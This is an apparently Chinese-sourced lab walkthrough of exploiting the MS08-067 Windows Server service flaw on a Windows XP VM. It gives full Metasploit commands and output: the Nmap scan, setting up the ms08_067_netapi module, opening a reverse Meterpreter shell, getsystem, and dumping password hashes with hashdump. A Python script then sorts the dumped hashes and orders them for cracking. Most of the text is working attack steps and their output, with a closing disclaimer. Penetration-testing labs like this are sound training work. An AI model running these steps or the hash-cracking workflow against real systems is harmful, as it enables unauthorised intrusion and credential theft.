MS08-067 is Microsoft's bulletin for the Windows Server service RPC request buffer overflow ("Vulnerability in Server Service Could Allow Remote Code Execution"). A specially crafted RPC request delivered to the Server service over SMB on an affected system can lead to remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003 the flaw is reachable without any authentication, so an attacker can run arbitrary code as the service itself (SYSTEM). That combination of unauthenticated network reach and full privileges is what made it usable for self-propagating worms; Microsoft shipped the fix in October 2008, and the Conficker worm spread through this exact hole on unpatched hosts.
The walkthrough below is a local lab: one Kali attacking host and one Windows XP target VM.

Kali attacker: 192.168.34.220
Windows XP target: 192.168.34.189
Step 1. Start PostgreSQL

Metasploit's database (host, service and session bookkeeping, and the store that `db_nmap` writes into) lives in PostgreSQL, so it has to be up before the framework.

```
root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
```
Step 2. Start Metasploit

```
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole
[... msfconsole ASCII-art banner ...]
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
```

The init scripts above are from the 2015-era Kali used here; on current Kali releases the equivalent is `systemctl start postgresql` followed by `msfdb init` (first run only), then `msfconsole`.
Step 3. Check the database connection

```
msf > db_status
[*] postgresql connected to msf3
```

If this reports no connection, `db_nmap` in the next step still runs the scan but nothing is stored, and `hosts`/`services` will be empty.
Step 4. Scan the target with Nmap from msfconsole

`db_nmap` is plain Nmap with the results imported into the database. `-sS` is a SYN scan, `-sV` probes service versions, `-O` fingerprints the OS, `-n` skips DNS, and `--script=smb-check-vulns.nse` runs the SMB vulnerability checks.

```
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT     STATE SERVICE          VERSION
[*] Nmap: 25/tcp   open  smtp             Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http             Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc            Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds     Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc            Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http             SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http             SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"\x01\t\xe0\x06")%r(SMBProgNeg,5,"\x01\t\xe0\x06")%r(T
[*] Nmap: SF:erminalServer,A,"\x01\t\xe0\x06\x01\t\xe0\x06")%r(WMSRequest,5,"\x0
[*] Nmap: SF:1\t\xe0\x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds
```

Read the result carefully: the scan establishes that SMB is open on 445/tcp and that the host is Windows XP SP2 or SP3, but the MS08-067 line says CHECK DISABLED, so the vulnerability itself was not tested. `smb-check-vulns` only runs that probe with `--script-args=unsafe=1`, because the check can crash the Server service on a vulnerable host; that is acceptable against a lab VM and not against a production system. (In later Nmap releases this script was replaced by the `smb-vuln-*` family, e.g. `smb-vuln-ms08-067`.) What actually confirms the target here is the exploit module's own fingerprinting in step 8.
Step 5. Find the exploit module

```
msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
```

The module name says what the bug is: a stack corruption in the Server service's NetAPI path-canonicalisation code, triggered through a relative path in an RPC request.
Step 6. Show the module options

```
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
```

Only RHOST is missing. RPORT 445 is direct SMB over TCP; if only 139/tcp (NetBIOS session) were open you would set RPORT to 139. SMBPIPE is the named pipe used to reach the Server service's RPC interface, and SRVSVC is the fallback if BROWSER is not exposed.
Step 7. Set the parameters

```
msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
```

No payload is set explicitly, so the module's default reverse-TCP Meterpreter is used and LHOST is taken from the attacker's interface (the handler line in step 8 shows 192.168.34.220:4444). On a multi-homed attacker host it is safer to set these by hand, e.g. `set PAYLOAD windows/meterpreter/reverse_tcp` and `set LHOST 192.168.34.220`, so the callback goes to the interface the target can actually reach.
Step 8. Run the exploit

```
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.220:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
```

Automatic targeting fingerprints the OS version, service pack and language over SMB and picks the return addresses for that exact build. This matters because the exploit is a stack overflow with hard-coded addresses: if the fingerprint is wrong or the build is not in the target list, the usual outcome is a crash of the Server service rather than a session, and you will not get a second attempt until the service is restarted. When auto-detection is wrong, `show targets` lists the builds and `set TARGET <id>` selects one explicitly.
Step 9. A shell comes back: working in Meterpreter

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
meterpreter > shell
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.34.189
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.34.254

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     SUPPORT_388945a0
The command completed with one or more errors.
```

Because the payload runs inside the Server service's svchost.exe, the session already has SYSTEM privileges; `getsystem` is a habit worth keeping for sessions that land as a lower-privileged user, and `getuid` tells you which case you are in. `hashdump` reads the local SAM and prints one line per account in pwdump format, `user:RID:LM_hash:NT_hash:::`. Two values in that output are worth recognising on sight: `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password (it also appears when LM storage is disabled or the password is longer than 14 characters), and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password, so the Guest account here has no password at all. Windows XP stores LM hashes by default, which is why most accounts above have a real LM value; LM is case-insensitive and split into two 7-character halves, so those are far cheaper to crack than the NT hashes.
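The triage a practitioner does on that `hashdump` output before reaching for a cracker can be scripted. The following Python is an added example written for this write-up; it is not code from the original post or from Metasploit. The sample input is constructed from the six lines shown above, the two empty-hash constants are the well-known LM and NT hashes of the empty string, and the finding strings and function names (`parse_hashdump`, `triage`, `shared_passwords`, `crack_queue`) are this example's own.

```python
"""Triage a Meterpreter `hashdump` (pwdump format) before any cracking.

Each line is  user:RID:LM_hash:NT_hash:::  . The example classifies every
account by what its LM/NT pair reveals, spots password reuse across accounts
and orders the cracking work so the cheap LM halves are attacked first.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, List, Tuple

# LM pads the uppercased password to 14 bytes, splits it into two 7-byte halves
# and DES-encrypts a constant with each; an all-NUL half always yields this value.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2                     # LM hash of ""
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"    # NT hash (MD4 of UTF-16LE) of ""

# Constructed sample: the hashdump lines from step 9 of this write-up.
SAMPLE_HASHDUMP = """\
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_present(self) -> bool:
        # A real LM hash means LM storage was on and the password is <= 14 chars.
        return self.lm != EMPTY_LM

    @property
    def lm_short(self) -> bool:
        # Empty second half: the whole password fits in the first 7-char block.
        return self.lm_present and self.lm[16:] == EMPTY_LM_HALF


def parse_hashdump(text: str) -> List[Account]:
    """Parse pwdump-style lines; anything that is not user:rid:lm:nt is skipped
    (prompts, command echoes and other console noise mixed into a paste)."""
    accounts: List[Account] = []
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        accounts.append(Account(parts[0], int(parts[1]), lm, nt))
    return accounts


def triage(accounts: List[Account]) -> Dict[str, List[str]]:
    """Map each user to its findings; the password-strength finding comes first."""
    report: Dict[str, List[str]] = {}
    for a in accounts:
        findings: List[str] = []
        if a.blank_password:
            findings.append("blank password")
        elif a.lm_short:
            findings.append("LM hash present, password <= 7 chars")
        elif a.lm_present:
            findings.append("LM hash present, password <= 14 chars")
        else:
            findings.append("no LM hash: password > 14 chars or LM storage disabled")
        if a.rid == 500:
            findings.append("built-in Administrator (RID 500)")
        if a.user.startswith(("IUSR_", "IWAM_")):
            findings.append("IIS anonymous/process account")
        report[a.user] = findings
    return report


def shared_passwords(accounts: List[Account]) -> Dict[str, List[str]]:
    """Users grouped by identical non-blank NT hash, i.e. the same password reused."""
    groups: Dict[str, List[str]] = {}
    for a in accounts:
        if not a.blank_password:
            groups.setdefault(a.nt, []).append(a.user)
    return {nt: users for nt, users in groups.items() if len(users) > 1}


def crack_queue(accounts: List[Account]) -> List[Tuple[str, str, str]]:
    """Work order for a cracker: LM first (case-insensitive 7-char halves are
    cheap), NT only where no LM hash exists; blank passwords need no cracking."""
    queue = [(a.user, "LM", a.lm) for a in accounts if not a.blank_password and a.lm_present]
    queue += [(a.user, "NT", a.nt) for a in accounts if not a.blank_password and not a.lm_present]
    return queue


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    for user, findings in triage(accts).items():
        print(f"{user:24s} {'; '.join(findings)}")
    print("reused passwords:", shared_passwords(accts) or "none")
    for user, kind, h in crack_queue(accts):
        print(f"crack {kind} {user}: {h}")
```

Run against the sample, the script flags Guest as having no password, the Administrator LM hash as covering at most 7 characters (its second half is the empty-block constant), and SUPPORT_388945a0 as the only account that needs its NT hash attacked directly. Cracking the LM halves first recovers the case-insensitive password, after which the NT hash only has to be matched against case variations of it.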
For the target VM used in this write-up, search Baidu. What is shared here is not very advanced, but hopefully everyone can follow it; the content on this site is of course not meant to encourage anyone to do anything that harms the country or security.